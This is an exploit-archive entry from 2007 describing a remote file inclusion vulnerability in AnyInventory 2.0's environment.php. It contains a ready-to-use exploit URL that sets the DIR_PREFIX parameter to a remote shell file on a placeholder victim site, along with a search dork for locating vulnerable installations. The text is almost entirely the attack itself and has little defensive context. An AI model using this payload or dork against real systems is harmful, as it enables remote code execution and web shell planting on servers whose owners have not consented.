AnyInventory <= 2.0 (environment.php) Remote File Inclusion Vuln

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : AnyInventory <= 2.0 (environment.php) Remote File Inclusion Vuln
# Published : 2007-09-05
# Author : ThE TiGeR
# Previous Title : phpMytourney (menu.php) Remote File Inclusion Vulnerability
# Next Title : PHPOF <= 20040226 (DB_adodb.class.php) RFI Vulnerability

#AnyInventory => 2.0 Remote file inclusion

#Download script : http://physics.ramapo.edu/downloads/anyInventory-1.9.1.tar.gz

#Exploit :

#http://victime.com/[anyInventory_path]/environment.php?DIR_PREFIX= shell.txt?

#Dork : anyInventory, the most flexible and powerful web-based inventory system

#Discovered by ThE TiGeR

#Miro_Tiger100[at]Hotmail.com

# www.Syue.com [2007-09-05]